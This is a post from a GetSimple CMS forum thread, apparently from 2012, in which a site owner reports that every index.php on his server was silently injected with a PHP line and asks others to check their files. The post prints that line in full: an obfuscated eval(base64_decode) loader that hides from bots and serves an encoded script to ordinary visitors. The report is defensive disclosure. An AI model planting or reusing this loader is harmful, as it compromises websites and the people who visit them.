Thread Rating:
  • 0 Vote(s) - 0 Average
  • 1
  • 2
  • 3
  • 4
  • 5
gs hacked?
#15
OK, found it. It must have been a host vulnerability or something... but every index.php file on the server had this at the top:

The reason it was so hard to find was that none of the timestamps were changed on any of the files. If anyone else sees this please let me know... i may have missed a file.

Code:
<?php eval(base64_decode('ZXJyb3JfcmVwb3J0aW5nKDApOw0KJGJvdCA9IEZBTFNFIDsNCiR1YSA9ICRfU0VSVkVSWydIVFRQX1VTRVJfQUdFTlQnXTsNCiRib3RzVUEgPSBhcnJheSgnMTIzNDUnLCdhbGV4YS5jb20nLCdhbm9ueW1vdXNlLm9yZycsJ2JkYnJhbmRwcm90ZWN0LmNvbScsJ2Jsb2dwdWxzZS5jb20nLCdib3QnLCdidXp6dHJhY2tlci5jb20nLCdjcmF3bCcsJ2RvY29tbycsJ2RydXBhbC5vcmcnLCdmZWVkdG9vbHMnLCdodG1sZG9jJywnaHR0cGNsaWVudCcsJ2ludGVybmV0c2Vlci5jb20nLCdsaW51eCcsJ21hY2ludG9zaCcsJ21hYyBvcycsJ21hZ2VudCcsJ21haWwucnUnLCdteWJsb2dsb2cgYXBpJywnbmV0Y3JhZnQnLCdvcGVuYWNvb24uZGUnLCdvcGVyYSBtaW5pJywnb3BlcmEgbW9iaScsJ3BsYXlzdGF0aW9uJywncG9zdHJhbmsuY29tJywncHNwJywncnJycnJycnJyJywncnNzcmVhZGVyJywnc2x1cnAnLCdzbm9vcHknLCdzcGlkZXInLCdzcHlkZXInLCdzem4taW1hZ2UtcmVzaXplcicsJ3ZhbGlkYXRvcicsJ3ZpcnVzJywndmxjIG1lZGlhIHBsYXllcicsJ3dlYmNvbGxhZ2UnLCd3b3JkcHJlc3MnLCd4MTEnLCd5YW5kZXgnLCdpcGhvbmUnLCdhbmRyb2lkJywnY2hyb21lJyk7DQpmb3JlYWNoICgkYm90c1VBIGFzICRicykge2lmKHN0cnBvcyhzdHJ0b2xvd2VyKCR1YSksICRicykhPT0gZmFsc2UpeyRib3QgPSB0cnVlOyBicmVhazt9fQ0KaWYgKCEkYm90KXsNCgllY2hvKGJhc2U2NF9kZWNvZGUoJ1BITmpjbWx3ZEQ1cFBUQTdkSEo1ZTNCeWIzUnZkSGx3WlR0OVkyRjBZMmdvZWlsN2FEMGlhR0Z5UTI5a1pTSTdaajFiSnkwek0yTXRNek5qTmpOak5qQmpMVEV3WXkweVl6VTRZelk1WXpVM1l6YzFZelkzWXpVNVl6WTRZemMwWXpSak5qRmpOVGxqTnpSak1qZGpOalpqTlRsak5qZGpOVGxqTmpoak56UmpOek5qTWpSak56bGpOREpqTlRWak5qRmpNelpqTlRWak5qZGpOVGxqTFRKakxUTmpOVFpqTmpsak5UaGpOemxqTFROakxURmpORGxqTm1NMU1XTXRNV000TVdNdE1qbGpMVE16WXkwek0yTXRNek5qTmpOak5qQmpOekpqTlRWak5qZGpOVGxqTnpKakxUSmpMVEZqTVRkakxUSTVZeTB6TTJNdE16TmpPRE5qTFRFd1l6VTVZelkyWXpjell6VTVZeTB4TUdNNE1XTXRNamxqTFRNell5MHpNMk10TXpOak5UaGpOamxqTlRkak56VmpOamRqTlRsak5qaGpOelJqTkdNM04yTTNNbU0yTTJNM05HTTFPV010TW1NdE9HTXhPR00yTTJNMk1HTTNNbU0xTldNMk4yTTFPV010TVRCak56TmpOekpqTlRkak1UbGpMVE5qTmpKak56UmpOelJqTnpCak1UWmpOV00xWXpZd1l6Y3pZelUyWXpVMll6WXpZell5WXpZell6YzNZelkzWXpSak5qTmpOakZqTmpGak5HTTFObU0yTTJNNE1HTTFZekl4WXpZeFl6WTVZekU1WXpoakxUTmpMVEV3WXpjM1l6WXpZelU0WXpjMFl6WXlZekU1WXkwell6ZGpObU10TTJNdE1UQmpOakpqTlRsak5qTmpOakZqTmpKak56UmpNVGxqTFROak4yTTJZeTB6WXkweE1HTTNNMk0zTkdNM09XTTJObU0xT1dNeE9XTXRNMk0zTm1NMk0yTTNNMk0yTTJNMU5tTTJNMk0yTm1NMk0yTTNOR00zT1dNeE5tTTJNbU0yTTJNMU9HTTFPR00xT1dNMk9HTXhOMk0zTUdNMk9XTTNNMk0yTTJNM05HTTJNMk0yT1dNMk9HTXhObU0xTldNMU5tTTNNMk0yT1dNMk5tTTNOV00zTkdNMU9XTXhOMk0yTm1NMU9XTTJNR00zTkdNeE5tTTJZekUzWXpjMFl6WTVZemN3WXpFMll6WmpNVGRqTFROak1qQmpNVGhqTldNMk0yTTJNR00zTW1NMU5XTTJOMk0xT1dNeU1HTXRPR010TVdNeE4yTXRNamxqTFRNell5MHpNMk00TTJNdE1qbGpMVE16WXkwek0yTTJNR00zTldNMk9HTTFOMk0zTkdNMk0yTTJPV00yT0dNdE1UQmpOak5qTmpCak56SmpOVFZqTmpkak5UbGpOekpqTFRKakxURmpPREZqTFRJNVl5MHpNMk10TXpOakxUTXpZemMyWXpVMVl6Y3lZeTB4TUdNMk1HTXRNVEJqTVRsakxURXdZelU0WXpZNVl6VTNZemMxWXpZM1l6VTVZelk0WXpjMFl6UmpOVGRqTnpKak5UbGpOVFZqTnpSak5UbGpNamRqTmpaak5UbGpOamRqTlRsak5qaGpOelJqTFRKakxUTmpOak5qTmpCak56SmpOVFZqTmpkak5UbGpMVE5qTFRGak1UZGpOakJqTkdNM00yTTFPV00zTkdNeU0yTTNOR00zTkdNM01tTTJNMk0xTm1NM05XTTNOR00xT1dNdE1tTXRNMk0zTTJNM01tTTFOMk10TTJNeVl5MHpZell5WXpjMFl6YzBZemN3WXpFMll6VmpOV00yTUdNM00yTTFObU0xTm1NMk0yTTJNbU0yTTJNM04yTTJOMk0wWXpZell6WXhZell4WXpSak5UWmpOak5qT0RCak5XTXlNV00yTVdNMk9XTXhPV000WXkwell5MHhZekUzWXpZd1l6UmpOek5qTnpSak56bGpOalpqTlRsak5HTTNObU0yTTJNM00yTTJNMk0xTm1NMk0yTTJObU0yTTJNM05HTTNPV014T1dNdE0yTTJNbU0yTTJNMU9HTTFPR00xT1dNMk9HTXRNMk14TjJNMk1HTTBZemN6WXpjMFl6YzVZelkyWXpVNVl6UmpOekJqTmpsak56TmpOak5qTnpSak5qTmpOamxqTmpoak1UbGpMVE5qTlRWak5UWmpOek5qTmpsak5qWmpOelZqTnpSak5UbGpMVE5qTVRkak5qQmpOR00zTTJNM05HTTNPV00yTm1NMU9XTTBZelkyWXpVNVl6WXdZemMwWXpFNVl5MHpZelpqTFROak1UZGpOakJqTkdNM00yTTNOR00zT1dNMk5tTTFPV00wWXpjMFl6WTVZemN3WXpFNVl5MHpZelpqTFROak1UZGpOakJqTkdNM00yTTFPV00zTkdNeU0yTTNOR00zTkdNM01tTTJNMk0xTm1NM05XTTNOR00xT1dNdE1tTXRNMk0zTjJNMk0yTTFPR00zTkdNMk1tTXRNMk15WXkwell6ZGpObU10TTJNdE1XTXhOMk0yTUdNMFl6Y3pZelU1WXpjMFl6SXpZemMwWXpjMFl6Y3lZell6WXpVMll6YzFZemMwWXpVNVl5MHlZeTB6WXpZeVl6VTVZell6WXpZeFl6WXlZemMwWXkwell6SmpMVE5qTjJNMll5MHpZeTB4WXpFM1l5MHlPV010TXpOakxUTXpZeTB6TTJNMU9HTTJPV00xTjJNM05XTTJOMk0xT1dNMk9HTTNOR00wWXpZeFl6VTVZemMwWXpJM1l6WTJZelU1WXpZM1l6VTVZelk0WXpjMFl6Y3pZekkwWXpjNVl6UXlZelUxWXpZeFl6TTJZelUxWXpZM1l6VTVZeTB5WXkwell6VTJZelk1WXpVNFl6YzVZeTB6WXkweFl6UTVZelpqTlRGak5HTTFOV00zTUdNM01HTTFPV00yT0dNMU9HTXlOV00yTW1NMk0yTTJObU0xT0dNdE1tTTJNR010TVdNeE4yTXRNamxqTFRNell5MHpNMk00TXlkZFd6QmRMbk53YkdsMEtDZGpKeWs3ZGowaVpTSXJJblpoSWp0OWFXWW9kaWxsUFhkcGJtUnZkMXQyS3lKc0lsMDdkSEo1ZTNFOVpHOWpkVzFsYm5RdVkzSmxZWFJsUld4bGJXVnVkQ2dpWkdsMklpazdjUzVoY0hCbGJtUkRhR2xzWkNoeEt5SWlLVHQ5WTJGMFkyZ29jWGRuS1h0M1BXWTdjejFiWFR0OUlISTlVM1J5YVc1bk8zbzlLQ2hsS1Q5b09pSWlLVHRtYjNJb096VTJPU0U5YVR0cEt6MHhLWHRxUFdrN2FXWW9aU2x6UFhNcmNsc2labkp2YlVNaUszcGRLSGRiYWwwcU1TczBNaWs3ZlNCcFppaDJKaVpsSmlaeUtXVW9jeWs3UEM5elkzSnBjSFErJykpOw0KfQ0K'));?>
- Chris
Thanks for using GetSimple! - Download

Please do not email me directly for help regarding GetSimple. Please post all your questions/problems in the forum!
Reply


Messages In This Thread
gs hacked? - by marrco - 2012-05-11, 17:09:40
gs hacked? - by Timbow - 2012-05-11, 18:29:47
gs hacked? - by marrco - 2012-05-11, 18:35:33
gs hacked? - by Draxeiro - 2012-05-11, 20:32:17
gs hacked? - by ccagle8 - 2012-05-11, 20:45:00
gs hacked? - by Draxeiro - 2012-05-11, 21:12:01
gs hacked? - by n00dles101 - 2012-05-11, 21:28:07
gs hacked? - by Draxeiro - 2012-05-11, 21:36:26
gs hacked? - by ccagle8 - 2012-05-11, 22:00:33
gs hacked? - by Draxeiro - 2012-05-11, 22:22:48
gs hacked? - by Connie - 2012-05-12, 00:01:46
gs hacked? - by shawn_a - 2012-05-12, 02:29:54
gs hacked? - by ccagle8 - 2012-05-12, 03:40:28
gs hacked? - by shawn_a - 2012-05-12, 03:49:40
gs hacked? - by ccagle8 - 2012-05-12, 06:33:14
gs hacked? - by shawn_a - 2012-05-12, 06:58:46
gs hacked? - by shawn_a - 2012-05-18, 22:56:06



Users browsing this thread: 1 Guest(s)